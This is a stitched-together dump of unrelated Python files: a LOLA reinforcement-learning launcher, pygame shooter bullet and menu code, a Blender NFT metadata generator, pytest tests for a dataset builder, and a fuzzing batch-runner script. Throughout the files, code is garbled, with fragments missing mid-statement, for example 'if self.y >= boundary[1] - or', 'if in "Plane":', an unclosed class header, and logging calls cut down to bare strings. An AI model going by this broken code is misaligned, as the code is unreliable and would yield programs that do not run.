#### File: lola/scripts/ ```python import click import time from lola import logger from lola.envs import * import sys sys.path.append('../../lio/env/') from room_symmetric_lola import EscapeRoom from room_asymmetric_lola import EscapeRoomAsym @click.command() # Experiment parameters @click.option("--exp_name", type=str, default="IPD", help="Name of the experiment (and correspondingly environment).") @click.option("--num_episodes", type=int, default=None, help="Number of episodes.") @click.option("--trace_length", type=int, default=None, help="Lenght of the traces.") @click.option("--exact/--no-exact", default=True, help="Whether to run the exact version of LOLA.") @click.option("--pseudo/--no-pseudo", default=False, help="Only used with exact version of LOLA.") @click.option("--grid_size", type=int, default=3, help="Grid size of the coin game (used only for coin game).") @click.option("--trials", type=int, default=2, help="Number of trials.") @click.option("--n_agents", type=int, default=2, help="Number of agents.") # Learning parameters @click.option("--lola/--no-lola", default=True, help="Add the crazy LOLA corrections to the computation.") @click.option("--opp_model/--no-opp_model", default=False, help="Whether to model opponent or use true parameters " "(use only for coin game).") @click.option("--mem_efficient/--no-mem_efficient", default=True, help="Use a more memory efficient corrections method.") @click.option("--lr", type=float, default=None, help="Learning rate for Adam optimizer.") @click.option("--lr_correction", type=float, default=1, help="Learning rate for corrections.") @click.option("--batch_size", type=int, default=None, help="Number of episodes to optimize at the same time.") @click.option("--bs_mul", type=int, default=1, help="Number of episodes to optimize at the same time") # Policy parameters @click.option("--simple_net/--no-simple_net", default=True, help="Use a simple policy (only for IPD and IMP).") @click.option("--hidden", type=int, default=32, help="Size of the hidden layer.") @click.option("--num_units", type=int, default=64, help="Number of units in the MLP.") @click.option("--reg", type=float, default=0., help="Regularization parameter.") @click.option("--gamma", type=float, default=None, help="Discount factor.") # Escape room parameters @click.option("--sym/--asym", default=True, help="Symmetric Escape Room.") @click.option("--reward_type", type=str, default="continuous", help="Continuous or discrete reward-giving actions.") @click.option("--dirname", type=str, default="er-dc", help="subfolder name to save log files.") def main(exp_name, num_episodes, trace_length, exact, pseudo, grid_size, trials, lr, lr_correction, batch_size, bs_mul, simple_net, hidden, num_units, reg, gamma, lola, opp_model, mem_efficient, n_agents, sym, reward_type, dirname): # Sanity assert exp_name in {"CoinGame", "IPD", "IMP", "escape-room"} # Resolve default parameters if exact: num_episodes = 50 if num_episodes is None else num_episodes trace_length = 200 if trace_length is None else trace_length lr = 1. if lr is None else lr elif exp_name in {"IPD", "IMP"}: num_episodes = 600000 if num_episodes is None else num_episodes trace_length = 150 if trace_length is None else trace_length batch_size = 4000 if batch_size is None else batch_size lr = 1. if lr is None else lr elif exp_name == "CoinGame": num_episodes = 100000 if num_episodes is None else num_episodes trace_length = 150 if trace_length is None else trace_length batch_size = 4000 if batch_size is None else batch_size lr = 0.005 if lr is None else lr elif exp_name == "escape-room": num_episodes = 50000 if num_episodes is None else num_episodes trace_length = 5 if trace_length is None else trace_length batch_size = 50 if batch_size is None else batch_size lr = 1. if lr is None else lr # Import the right training function if exact: assert exp_name != "CoinGame", "Can't run CoinGame with --exact." def run(env): from lola.train_exact import train train(env, num_episodes=num_episodes, trace_length=trace_length, simple_net=simple_net, corrections=lola, pseudo=pseudo, num_hidden=hidden, reg=reg, lr=lr, lr_correction=lr_correction, gamma=gamma) elif exp_name in {"IPD", "IMP"}: def run(env): from lola.train_pg import train train(env, num_episodes=num_episodes, trace_length=trace_length, batch_size=batch_size, gamma=gamma, set_zero=0, lr=lr, corrections=lola, simple_net=simple_net, hidden=hidden, mem_efficient=mem_efficient) elif exp_name == "CoinGame": def run(env): from lola.train_cg import train train(env, num_episodes=num_episodes, trace_length=trace_length, batch_size=batch_size, bs_mul=bs_mul, gamma=gamma, grid_size=grid_size, lr=lr, corrections=lola, opp_model=opp_model, hidden=hidden, mem_efficient=mem_efficient) elif exp_name == "escape-room": def run(env, logdir): if not sym: from lola.train_er_asym import train else: if reward_type == 'continuous': from lola.train_er_discrete_continuous import train elif n_agents == 2: from lola.train_er import train elif n_agents == 3: from lola.train_er_3player import train else: raise ValueError("Only 2 or 3 agents are supported for Escape Room.") train(env, num_episodes=num_episodes, trace_length=trace_length, batch_size=batch_size, gamma=gamma, set_zero=0, lr=lr, corrections=lola, simple_net=simple_net, hidden1=64, hidden2=32, mem_efficient=mem_efficient, logdir=logdir) # Instantiate the environment if exp_name == "IPD": env = IPD(trace_length) gamma = 0.96 if gamma is None else gamma elif exp_name == "IMP": env = IMP(trace_length) gamma = 0.9 if gamma is None else gamma elif exp_name == "CoinGame": env = CG(trace_length, batch_size, grid_size) gamma = 0.96 if gamma is None else gamma elif exp_name == "escape-room": gamma = 0.99 if gamma is None else gamma if not sym: env = EscapeRoomAsym(trace_length) else: if reward_type == 'continuous': # giving rewards is handled outside env for the # case of continuous reward-giving actions env = EscapeRoom(trace_length, n_agents, incentivization_inside_env=False) else: env = EscapeRoom(trace_length, n_agents, incentivization_inside_env=True) # Run training # for seed in range(trials): for seed in range(0, 1): # logdir = 'logs/{}/seed-{}'.format(exp_name, seed) # logdir = 'logs/{}/inexact-seed-{}'.format(exp_name, seed) # logdir = 'logs/{}/lr0p1-{}'.format(exp_name, seed) # logdir = 'logs/{}/n{}-lr10-{}'.format(exp_name, n_agents, seed) logdir = 'logs/{}/n{}-lr{}-{}'.format( dirname, n_agents, str(lr).replace('.', 'p'), seed) logger.configure(dir=logdir) start_time = time.time() run(env, logdir) # run(env) end_time = time.time() logger.reset() if __name__ == '__main__': main() ```
{ "source": "0112leesy/2021-2-OSSProj-PlusAlpha-9", "score": 4 }
#### File: 2021-2-OSSProj-PlusAlpha-9/boss/ ```python from math import * import pygame from object.Object import Object from pygame.math import Vector2 #보스의 발사체를 위한 총알 클래스 bullet class for boss bullet class Bullet(Object): #extend Object def __init__(self, img_path, size, velocity, fire_loc, target_loc): super().__init__(img_path, size, velocity) #calculate direction from fire_loc to target_loc if((sqrt((target_loc[0] - fire_loc[0]) ** 2 + (target_loc[1] - fire_loc[1]) ** 2)) == 0): self.dx=1 self.dy=1 else: self.dx = int((velocity) * (target_loc[0] - fire_loc[0]) / (sqrt((target_loc[0] - fire_loc[0]) ** 2 + (target_loc[1] - fire_loc[1]) ** 2))) self.dy = int((velocity) * (target_loc[1] - fire_loc[1]) / (sqrt((target_loc[0] - fire_loc[0]) ** 2 + (target_loc[1] - fire_loc[1]) ** 2))) self.calc_dir(self.dx, self.dy) self.x = fire_loc[0] self.y = fire_loc[1] def move(self,boundary,game): #move bullet if (game.size[0] != self.boundary[0]) or (game.size[1] != self.boundary[1]): self.on_resize(game) self.calc_dir(self.dx, self.dy) self.x += self.dx self.y += self.dy self.update_rect((self.x, self.y)) if self.y >= boundary[1] - or self.x>=boundary[0] or self.x<0 or self.y< 0: #remove bullet if OOB game.enemyBullets.remove(self) def calc_dir(self, dx, dy): direction = Vector2(dx,dy) radius, angle = direction.as_polar() self.img = pygame.transform.rotozoom(self.img, -angle - 90.0, 1) ``` #### File: 2021-2-OSSProj-PlusAlpha-9/menu/ ```python import pygame import pygame_menu from data.CharacterDataManager import * from data.Defs import * from data.Stage import Stage from data.StageDataManager import * from game.InfiniteGame import * from game.StageGame import StageGame from pygame_menu.baseimage import IMAGE_MODE_FILL, IMAGE_MODE_SIMPLE from pygame_menu.locals import ALIGN_LEFT, ALIGN_RIGHT from pygame_menu.utils import make_surface # 캐릭터 선택 메뉴 class CharacterSelectMenu( image_widget: 'pygame_menu.widgets.Image' item_description_widget: 'pygame_menu.widgets.Label' def __init__(self,screen,attr): # 화면 받고 화면 크기 값 받기 self.screen = screen self.size = screen.get_size() menu_image = pygame_menu.baseimage.BaseImage(image_path='./Image/StartImage.png',drawing_mode=pygame_menu.baseimage.IMAGE_MODE_FILL) mytheme = pygame_menu.themes.THEME_ORANGE.copy() mytheme.background_color = menu_image super().__init__('Select Character...', self.size[0], self.size[1], theme=mytheme) #선택된 스테이지 self.attr =attr #캐릭터 데이터를 json에서 불러온다 self.character_data = CharacterDataManager.load() self.mainloop(self.screen,bgfun = self.check_resize) def to_menu(self): self.disable() #메뉴 구성하고 보이기 def show(self): #캐릭터 선택 메뉴 구성 characters = [] for idx in range(len(self.character_data)): characters.append((self.character_data[idx].name, idx)) self.character_imgs = [] for idx in range(len(self.character_data)): default_image = pygame_menu.BaseImage( image_path=self.character_data[idx].img_path ).scale(0.5, 0.5) self.character_imgs.append(default_image.copy()) self.character_selector = self.add.selector( title='Character :\t', items=characters, onchange=self.on_selector_change ) self.image_widget = self.add.image( image_path=self.character_imgs[0], padding=(25, 0, 0, 0) # top, right, bottom, left ) self.item_description_widget = self.add.label(title = "Unlocked" if self.character_data[0].is_unlocked == True else "Locked") self.frame_v = self.add.frame_v(350, 160, margin=(10, 0)) # 각 캐릭터의 능력치 표시 self.power = self.frame_v.pack(self.add.progress_bar( title="Power", default=int((self.character_data[0].missile_power/Default.character.value["max_stats"]["power"])*100), progress_text_enabled = False, box_progress_color = Color.RED.value ), ALIGN_RIGHT) self.fire_rate = self.frame_v.pack(self.add.progress_bar( title="Fire Rate", default=int((Default.character.value["max_stats"]["fire_rate"]/self.character_data[0].org_fire_interval)*100), progress_text_enabled = False, box_progress_color =Color.BLUE.value ), ALIGN_RIGHT) self.velocity = self.frame_v.pack(self.add.progress_bar( title="Mobility", default=int((self.character_data[0].org_velocity/Default.character.value["max_stats"]["mobility"])*100), progress_text_enabled = False, box_progress_color = Color.GREEN.value ), ALIGN_RIGHT) self.add.button("PLAY",self.start_game) # self.add.button("BACK", self.add.button("BACK",self.to_menu) self.update_from_selection(int(self.character_selector.get_value()[0][1])) def start_game(self): #게임 시작 함수 # 캐릭터 셀릭터가 선택하고 있는 데이터를 get_value 로 가져와서, 그 중 Character 객체를 [0][1]로 접근하여 할당 selected_idx = self.character_selector.get_value()[0][1] #캐릭터가 열려있는지 확인 if (self.character_data[selected_idx].is_unlocked): #캐릭터가 열려있다면 if(isinstance(self.attr,InfiniteGame.Mode)): #인자가 난이도 모드의 객체이면 무한모드 실행 InfiniteGame(self.character_data[selected_idx],self.attr).main() else: #인자가 스테이지 객체이면 스테이지 모드 실행 StageGame(self.character_data,self.character_data[selected_idx],self.attr).main() else: print("character locked") print(self.character_data[selected_idx].name) self.showCharactereLockedScreen(self.character_data[selected_idx].name) # 잠긴 캐릭터 선택 시 보여지는 화면 def showCharactereLockedScreen(self, character): characterlocked_theme = pygame_menu.themes.THEME_DARK.copy() characterlocked_theme.title_bar_style = pygame_menu.widgets.MENUBAR_STYLE_SIMPLE characterlocked_theme.title_close_button_cursor = pygame_menu.locals.CURSOR_HAND characterlocked_theme.title_font_color = Color.WHITE.value self.size = self.screen.get_size() super().__init__('Character Locked!', self.size[0], self.size[1], theme=characterlocked_theme) if(character == 'F5S1'): self.add.image(Images.F5S1_locked.value, scale=Scales.default.value) elif(character == 'F5S4'): self.add.image(Images.F5S4_locked.value, scale=Scales.default.value) elif(character == 'Tank'): self.add.image(Images.Tank_locked.value, scale=Scales.default.value) self.add.label("") self.add.button('back', self.back_from_locked) self.mainloop(self.screen,bgfun = self.check_resize) def back_from_locked(self): self.disable() self.__init__(self.screen, self.attr) # 화면 크기 조정 감지 및 비율 고정 def check_resize(self): if (self.size != self.screen.get_size()): #현재 사이즈와 저장된 사이즈 비교 후 다르면 변경 changed_screen_size = self.screen.get_size() #변경된 사이즈 ratio_screen_size = (changed_screen_size[0],changed_screen_size[0]*783/720) #y를 x에 비례적으로 계산 if(ratio_screen_size[0]<320): #최소 x길이 제한 ratio_screen_size = (494,537) if(ratio_screen_size[1]>783): #최대 y길이 제한 ratio_screen_size = (720,783) self.screen = pygame.display.set_mode(ratio_screen_size, pygame.RESIZABLE) window_size = self.screen.get_size() new_w, new_h = 1 * window_size[0], 1 * window_size[1] self.resize(new_w, new_h) self.size = window_size self._current._widgets_surface = make_surface(0,0) print(f'New menu size: {self.get_size()}') # 캐릭터 변경 시 실행 def on_selector_change(self, selected, value: int) -> None: self.update_from_selection(value) # 캐릭터 선택 시 캐릭터 이미지 및 능력치 위젯 업데이트 def update_from_selection(self, selected_value, **kwargs) -> None: self.current = selected_value self.image_widget.set_image(self.character_imgs[selected_value]) self.power.set_value(int((self.character_data[selected_value].missile_power/Default.character.value["max_stats"]["power"])*100)) self.fire_rate.set_value(int((Default.character.value["max_stats"]["fire_rate"]/self.character_data[selected_value].org_fire_interval)*100)) self.velocity.set_value(int((self.character_data[selected_value].org_velocity/Default.character.value["max_stats"]["mobility"])*100)) self.item_description_widget.set_title(title = "Unlocked" if self.character_data[selected_value].is_unlocked == True else "Locked") ```
{ "source": "011Xpl/3D-NFT", "score": 2 }
#### File: 011Xpl/3D-NFT/ ```python ## INPUT #Code supporting `.blend` now. You can use all the extensions that Blender supports by editing the code. ## OUTPUT #`.png` and Metadata Jsons ## **WARNING! DON'T FORGET!** #1. Edit `data` #2. Edit count of `createObj` #3. Edit file name and file direction. ## DONATION #Buy me a bear! #ETH: 0x9904bFa1B183Eb9d9350A885Ddac8B1A8a80eb71 ##RARITY # weights=(10,10,10,10,10,50) # edit this, line 153,155,157 import random import json import os import bpy import bmesh import time import sys all_images = [] #ammount=1*6*6*6*1=216 count data = { "layers": [ { "name": "Body", "values": ["Yellow"] }, { "name": "Hat", "values": ["Alchemist","Arcmage","Darkmage","Druid","Mage","Witch"] }, { "name": "Robe", "values": ["Alchemist", "Arcmage","Darkmage", "Druid","Mage", "Witch"] }, { "name": "Staff", "values": ["Alchemist", "Arcmage","Darkmage", "Druid","Mage", "Witch"] }, { "name": "Background", "values": ["Black"] } ] } def metadataa(fle,i,body,glass,bag,cap, wp): x = open("C:\\Users\\pc\\Desktop\\test1\\json\\"+fle,'a+') metadata ={ "name": "", "description": "", "image": "", "edition": "", "attributes": [ { "trait_type": "Background", "value": "" }, { "trait_type": "Body", "value": "" }, { "trait_type": "Hat", "value": "" }, { "trait_type": "Robe", "value": "" }, { "trait_type": "Staff", "value": "" } ]} metadata['name']="Axolot" metadata['description']="It's just it" metadata['image']="ipfs://random/" metadata['edition']=i for i in metadata['attributes']: if (i["trait_type"]=="Background"): i["value"] = wp if (i["trait_type"]=="Body"): i["value"] = body if (i["trait_type"]=="Hat"): i["value"] = glass if (i["trait_type"]=="Robe"): i["value"] = bag if (i["trait_type"]=="Staff"): i["value"] = cap json_format = json.dumps(metadata, indent=2) x.write(json_format) def progress(count, total, status=''): bar_len = 60 filled_len = int(round(bar_len * count / float(total))) percents = round(100.0 * count / float(total), 1) bar = '=' * filled_len + '-' * (bar_len - filled_len) sys.stdout.write('[%s] %s%s ...%s\r' % (bar, percents, '%', status)) sys.stdout.flush() def collections(collection, col_list): col_list.append( for sub_collection in collection.children: collections(sub_collection, col_list) def clear(): collection =["Collection"] meshes = set() for obj in [o for o in collection.objects if o.type == 'MESH']: meshes = set() for obj in [o for o in collection.objects if o.type == 'LIGHT']: def clear_bg(): collection =["Collection"] meshes = set() for obj in [o for o in collection.objects if o.type == 'MESH']: if in "Plane": def createDna(data): new_image = {} for layer in data["layers"]: if (layer["name"]=="Background"): new_image[layer["name"]] = random.choices(layer["values"])[0] if (layer["name"]=="Body"): new_image[layer["name"]] = random.choices(layer["values"])[0] if (layer["name"]=="Hat"): new_image[layer["name"]] = random.choices(layer["values"],weights=(10,10,10,10,10,50))[0] if (layer["name"]=="Robe"): new_image[layer["name"]] = random.choices(layer["values"], weights=(10,10,10,10,10,50))[0] if (layer["name"]=="Staff"): new_image[layer["name"]] = random.choices(layer["values"], weights=(10,10,10,10,10,50))[0] if new_image in all_images: print("GEN> DNA EXITS") return createDna(data) else: print("GEN> NEW DNA: {}".format(new_image)) return new_image def createObj(ammount,data): for x in range(ammount): new_dna = createDna(data) all_images.append(new_dna) for y in range(ammount): clear() rez_list = [] progress(y, ammount, status='') z = y + 1 result_fbx = str(z)+".fbx" result_png = str(z)+".png" body_fbx=all_images[y]["Body"] +".blend" glass_fbx=all_images[y]["Hat"] +".blend" bag_fbx=all_images[y]["Robe"] +".blend" cap_fbx=all_images[y]["Staff"] +".blend" wp_fbx=all_images[y]["Background"] +".fbx" result_json = str(z)+".json" metadataa(result_json,z,all_images[y]["Body"],all_images[y]["Hat"], all_images[y]["Robe"],all_images[y]["Staff"],all_images[y]["Background"]) bpy.ops.wm.append(filename="Collection 1", directory=f"C:\\Users\\pc\\Desktop\\obj\\Body\\{body_fbx}\\Collection\\") bpy.ops.wm.append(filename="Collection 1", directory=f"C:\\Users\\pc\\Desktop\\obj\\Hat\\{glass_fbx}\\Collection\\") bpy.ops.wm.append(filename="Collection 1", directory=f"C:\\Users\\pc\\Desktop\\obj\\Robe\\{bag_fbx}\\Collection\\") bpy.ops.wm.append(filename="Collection 1", directory=f"C:\\Users\\pc\\Desktop\\obj\\Staff\\{cap_fbx}\\Collection\\") bpy.ops.import_scene.fbx(filepath="C:\\Users\\pc\\Desktop\\obj\\Background\\"+wp_fbx) bpy.context.scene.render.filepath = "C:\\Users\\pc\\Desktop\\test1\\png\\"+ result_png bpy.ops.render.render(use_viewport = True, write_still=True) clear_bg() collections(bpy.context.collection, rez_list) for x in rez_list: if x =="Collection": print("passed") else: collection =[x] clear() if __name__ =="__main__": #createObj(count,data) createObj(1,data) ```
{ "source": "01210210/police-brutality", "score": 3 }
#### File: tools/tests/ ```python import pytest from data_builder import title_to_name_date tests = [ ( 'Title here | May 30th', ('Title here', '2020-05-30', 'May 30th') ), ( 'Title here', ('Title here', '', '') ), ] @pytest.mark.parametrize("input,expected", tests) def test_title_to_name_date(input, expected): assert title_to_name_date(input) == expected def test_handle_missing_name(capsys): title_missing_name = '| May 30th' title_to_name_date(title_missing_name) captured = capsys.readouterr() assert "Failed name parse: missing name for" in str(captured) @pytest.mark.skip(reason="failing test, need to handle this case") def test_handle_name_with_multiple_pipes(): malformed_title = 'Thing happened | this day | May 30th' result = title_to_name_date(malformed_title) # what should happen here? def test_handle_missing_date(capsys): title_missing_date = 'Title thinger' title_to_name_date(title_missing_date) captured = capsys.readouterr() assert "Failed date parse: missing date for" in str(captured) def test_handle_weird_date_format(capsys): title_with_bad_date = 'Title | Leb 21' result = title_to_name_date(title_with_bad_date) captured = capsys.readouterr() assert "Failed date format parse for title" in str(captured) @pytest.mark.skip(reason="failing test, need to handle this case") def test_handle_nonexistant_date(): title_with_bad_date = 'Title | February 31st' result = title_to_name_date(title_with_bad_date) # what should happen here? ``` #### File: tools/tests/ ```python import pytest from data_builder import process_md_texts def test_handle_dc(): data = {'Washington DC': "### Title | June 1st\n\nDescription of things \n\n**Links**\n\n*"} result = process_md_texts(data) assert result[0]['city'] == 'DC' def test_handle_missing_location(): data = {'Unknown Location': "### Title | June 1st\n\nDescription of things \n\n**Links**\n\n*"} result = process_md_texts(data) assert result[0]['city'] == '' def test_handle_missing_links(capsys): data = {'Washington DC': "### Title | June 1st\n\nDescription of things \n\n**Links**\n\n\n\n### Another Title | May 31\n\nDescription.\n\n**Links**\n\n"} process_md_texts(data) captured = capsys.readouterr() assert "Failed links parse: missing links for" in str(captured) def test_more_than_200_records_found(): pass ```
{ "source": "0152la/SpecAST", "score": 2 }
#### File: SpecAST/scripts/ ```python import argparse import datetime import git import logging import math import os import random import shlex import shutil import signal import subprocess import statistics import sys import time import yaml import pdb ############################################################################### # Argument parsing ############################################################################### parser = argparse.ArgumentParser( description = "Metalib batch experiment generator and runner", formatter_class = argparse.RawTextHelpFormatter) parser.add_argument("config", type=str, help = "Path to configuration yaml file.") # MODE SETTINGS parser.add_argument("--mode", choices=["count", "time", "generate"], default="count", help = """Select the mode of the tool. count - generate and execute a number of tests [DEFAULT] time - generate and execute for a set amount of time generate - generate single test case""") parser.add_argument("--mode-val", type=int, default=100, help = """Mode-dependent value selector. Set `-1` for infinity. `count` mode - sets number of tests to generate `time` mode - sets time to execute in seconds.""") # PARAMETERS parser.add_argument("--seed", type=int, default=random.randint(0, sys.maxsize), help = "Seed to initialize random generator in script.") parser.add_argument("--gen-timeout", type=int, default=30, help = "Maximum time, in seconds, to allow generation for a test case.") parser.add_argument("--run-timeout", type=int, default=120, help = "Maximum time, in seconds, to allow execution of generated test cases.") parser.add_argument("--stop-on-fail", action='store_true', help = "If set, testing stops on first execution failure.") parser.add_argument("--append-id", action='store_true', help = "If set, appends a random numeric hash to the output folder") # DEBUG OPTIONS parser.add_argument("--debug", action='store_true', help = "If set, emit runtime debug information") parser.add_argument("--debug-to-file", action='store_true', help = "If set, emits debug output to log file.") parser.add_argument("--runtime-log", type=str, default="runtime.log", help = "Name of log for runtime information.") parser.add_argument("--stats-log", type=str, default="stats.log", help = "Name of log file to store statistics about test executions.") parser.add_argument("--log-all-tests", action='store_true', help = "If set, saves all generated test files, instead of only the failing" " ones.") parser.add_argument("--always-log-out", action='store_true', help = "If set, always prints the output of STDOUT and STDERR for test"\ " generation phases.") # OTHER OPTIONS parser.add_argument("--no-symlink", action='store_true', help = "If set, will not symlink the testing folder for ease access to the " "latest experimental run. Useful for running things in parallel.") parser.add_argument("--print-cmd-out", action='store_true', help = "If set, prints to console the STDOUT and STDERR for test"\ " generation phases.") TIMEOUT_STR = "TIMEOUT" ############################################################################### # Helper functions ############################################################################### def exec_cmd(name, cmd, test_id, timeout=None, log_test=False): if not timeout: log_console.debug(f"Running {name} command:\n\t*** {cmd}") else: log_console.debug(f"Running {name} command with t/o {timeout}:\n\t*** {cmd}") start_time = time.perf_counter() cmd_proc = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8") try: out, err = cmd_proc.communicate(timeout=timeout) exec_time = time.perf_counter() - start_time proc_timeout = False except subprocess.TimeoutExpired: proc_timeout = True cmd_proc.kill() out, err = cmd_proc.communicate() exec_time = TIMEOUT_STR"{name} return code: {cmd_proc.returncode}")"{name} duration: {exec_time}") if cmd_proc.returncode != 0 or args.always_log_out: if proc_timeout:"TIMEOUT {name} command") else:"FAIL {name} command") log_runtime.debug(f"STDOUT:\n{out}") log_runtime.debug(f"STDERR:\n{err}") if args.print_cmd_out:"STDOUT:\n{out}")"STDERR:\n{err}") test_save_name = "" if proc_timeout: log_console.warning(f"Timeout {name} command for test count {test_id}!") if log_test: test_save_name = f"{test_id:07d}_{name}_timeout" elif cmd_proc.returncode != 0: log_console.warning(f"Failed {name} command for test count {test_id}!") test_save_name = f"{test_id:07d}_{name}_fail" elif log_test: test_save_name = f"{test_id:07d}_{name}" if test_save_name: try: shutil.copyfile(full_output_file_name, f"{save_test_folder}/{test_save_name}") except FileNotFoundError: pass stats = {} stats["exec_time"] = exec_time stats["return_code"] = cmd_proc.returncode return stats def terminate_handler(sig, frame):"Received terminate signal, finishing...") global terminate terminate = True def emit_times_stats(times, t_type, writer): try: writer.write(f"Average {t_type} times: ") writer.write(str(statistics.mean([x for x in times if isinstance(x, float)]))) writer.write("\n") writer.write(f"Median {t_type} times: ") writer.write(str(statistics.median([x for x in times if isinstance(x, float)]))) writer.write("\n") except statistics.StatisticsError: writer.write(f"Average {t_type} times: all t/o\n") writer.write(f"Median {t_type} times: all t/o\n") def make_abs_path(pth, log, check_exists = False): if not os.path.isabs(pth): log.debug(f"Expanding found relative path `{pth}`.") a_pth = os.path.abspath(pth) try: assert (not check_exists or os.path.exists(pth)) except AssertionError: print(f"Inexistent absolute path `{a_pth}` expanded from relative path `{pth}`.") return a_pth log.debug(f"Returning found absolute path `{pth}`.") return pth def log_git_repo_data(pth, describer, writer): try: pth_repo = git.Repo(pth) writer.write(f"{describer} version: {pth_repo.head.commit.hexsha}\n") except (KeyError): writer.write(f"{describer} version: KeyError\n") except (git.exc.NoSuchPathError): writer.write(f"{describer} version: NoSuchPathError\n") except (git.exc.InvalidGitRepositoryError): writer.write(f"{describer} version: InvalidGitRepoError\n") ############################################################################### # Main function ############################################################################### if __name__ == '__main__': args = parser.parse_args() signal.signal(signal.SIGTERM, terminate_handler) if args.debug: log_level = logging.DEBUG else: log_level = logging.INFO log_console = logging.getLogger('console') log_console_handler = logging.StreamHandler(sys.stdout) log_console.addHandler(log_console_handler) log_console.setLevel(log_level) log_console.debug("Debug mode set") log_console.debug(f"Setting mode {args.mode} with value {args.mode_val}") log_console.debug(f"Setting seed {args.seed}") random.seed(args.seed) log_console.debug(f"Parsing YAML config file {args.config}") with open(args.config, 'r') as config_fd: config = yaml.load(config_fd, Loader=yaml.FullLoader) config['working_dir'] = make_abs_path(config['working_dir'], log_console, True) log_console.debug(f"Setting cwd to {config['working_dir']}") os.chdir(config["working_dir"]) config['output_folder'] = make_abs_path(config['output_folder'], log_console) symlink_name = f"{config['output_folder']}_last" if args.append_id: config['output_folder'] += f"_{random.getrandbits(20):07d}" full_output_file_name = f"{config['output_folder']}/{config['output_file_name']}" if os.path.exists(config['output_folder']): log_console.debug(f"Removing existing output folder {config['output_folder']}.") shutil.rmtree(config['output_folder']) log_console.debug(f"Creating output folder {config['output_folder']}.") os.makedirs(config['output_folder'], exist_ok=True) if not args.no_symlink: if os.path.exists(symlink_name): os.remove(symlink_name) os.symlink(config['output_folder'], symlink_name) save_test_folder_name = "tests" save_test_folder = f"{config['output_folder']}/{save_test_folder_name}" os.makedirs(save_test_folder, exist_ok=False) log_runtime_filename = args.runtime_log log_console.debug(f"Setting runtime log file `{log_runtime_filename}`") log_runtime = logging.getLogger('gentime') log_runtime.setLevel(log_level) log_runtime_handler = logging.FileHandler(f"{config['output_folder']}/{log_runtime_filename}", 'w', "utf-8") log_runtime.addHandler(log_runtime_handler) if args.debug_to_file: log_console.addHandler(log_runtime_handler) # Concatenate all parameters and values together and prefix the parameter # flag name with '--' param_string = " ".join(["--" + x + " " + str(config['params'][x]) for x in config['params']]) stats = {} stats["total_tests"] = 0 stats["gen_fail"] = 0 stats["compile_fail"] = 0 stats["timeout_tests"] = 0 stats["fail_tests"] = 0 stats["test_gentimes"] = [] stats["test_compiletimes"] = [] stats["test_runtimes"] = [] stats["run_return_codes"] = {} test_count = 0 terminate = False experiment_start_time = time.perf_counter() while not terminate: if args.mode_val != -1: if args.mode == "count" and args.mode_val <= test_count: log_console.debug(f"Hit max number of given tests; stopping...") break elif args.mode == "time" and args.mode_val <= time.perf_counter() - experiment_start_time: log_console.debug(f"Executed max number of given seconds; stopping...") break elif args.mode == "generate" and test_count != 0: log_console.debug(f"Generated one test case; stopping...") sys.exit(0) test_count += 1 stats["total_tests"] += 1 if not args.debug: log_console_handler.terminator = '\r' curr_time ="%Y-%m-%d %H:%M:%S") curr_time = "\033[1m\033[31m" + curr_time + "\033[0m" log_console.debug(f"[{curr_time}] Test count {test_count} - Elapsed time {time.perf_counter() - experiment_start_time} - Mode {args.mode} - Mode Value {args.mode_val}") gen_seed = args.seed if args.mode == "generate" else random.randrange(sys.maxsize) log_console.debug(f"Generating test with seed {gen_seed}")"===== Test count {test_count} with seed {gen_seed}") config['template_file'] = make_abs_path(config['template_file'], log_console, True) gen_cmd = f"./build/mtFuzzer {config['template_file']}"\ f" -o {full_output_file_name}"\ f" --seed {gen_seed}"\ f" {param_string}" gen_result = exec_cmd("generate", gen_cmd, test_count, timeout=args.gen_timeout) stats["test_gentimes"].append(gen_result["exec_time"]) if gen_result["return_code"] != 0: stats["gen_fail"] += 1 continue if args.mode == "generate": log_console.debug(f"Generated one test case; stopping...") sys.exit(0) config['cmake_script_dir'] = make_abs_path(config['cmake_script_dir'], log_console, True) compile_cmd = f"{os.path.abspath(config['compile_script'])} {full_output_file_name} {config['cmake_script_dir']}" old_cwd = os.getcwd() os.chdir(config['output_folder']) compile_result = exec_cmd("compile", compile_cmd, test_count) stats["test_compiletimes"].append(compile_result["exec_time"]) if compile_result["return_code"] != 0: stats["compile_fail"] += 1 os.chdir(old_cwd) continue os.chdir(old_cwd) run_output_file_name = os.path.splitext(f"{full_output_file_name}")[0] run_cmd = f"{run_output_file_name}" run_result = exec_cmd("execute", run_cmd, test_count, timeout=args.run_timeout, log_test=args.log_all_tests) stats["test_runtimes"].append(run_result["exec_time"]) if not run_result['return_code'] in stats['run_return_codes']: stats['run_return_codes'][run_result['return_code']] = 0 stats['run_return_codes'][run_result['return_code']] += 1 if run_result["return_code"] != 0: if run_result["exec_time"] == TIMEOUT_STR: stats["timeout_tests"] += 1 else: stats["fail_tests"] += 1 if args.stop_on_fail and run_result["exec_time"] != TIMEOUT_STR:"Found execution failure and `stop_on_fail` set; exitting..."); break continue experiment_time = time.perf_counter() - experiment_start_time log_console_handler.terminator = '\n'"Finished experiments {config['output_folder']}.") with open(f"{config['output_folder']}/{args.stats_log}", 'w') as stats_writer: log_git_repo_data(config['working_dir'], "Generator", stats_writer) log_git_repo_data(config['spec_repo_dir'], "Specification", stats_writer) log_git_repo_data(config['lib_repo_dir'], "Library under test", stats_writer) stats_writer.write(80 * '-' + '\n'); stats_writer.write(f"Seed: {args.seed}\n") stats_writer.write(f"Gen timeout: {args.gen_timeout}\n") stats_writer.write(f"Run timeout: {args.run_timeout}\n") stats_writer.write(f"Parameters: {param_string}\n") stats_writer.write(80 * '-' + '\n'); stats_writer.write(f"Total experiment time: {datetime.timedelta(seconds=math.trunc(experiment_time))}\n") stats_writer.write(f"Total test count: {stats['total_tests']}\n") stats_writer.write(f"Total generation fails: {stats['gen_fail']}\n") stats_writer.write(f"Total compilation fails: {stats['compile_fail']}\n") stats_writer.write(f"Total execution fails: {stats['fail_tests']}\n") stats_writer.write(f"Total execution timeouts: {stats['timeout_tests']}\n") stats_writer.write(80 * '-' + '\n'); emit_times_stats(stats['test_gentimes'], "generation", stats_writer) emit_times_stats(stats['test_compiletimes'], "compile", stats_writer) emit_times_stats(stats['test_runtimes'], "execution", stats_writer) stats_writer.write(80 * '=' + '\n'); stats_writer.write(f"\nRaw data:\n") stats_writer.write(yaml.dump(stats)) ```
{ "source": "0190342791072401740917904E9012740997199/TransformiceServer", "score": 2 }
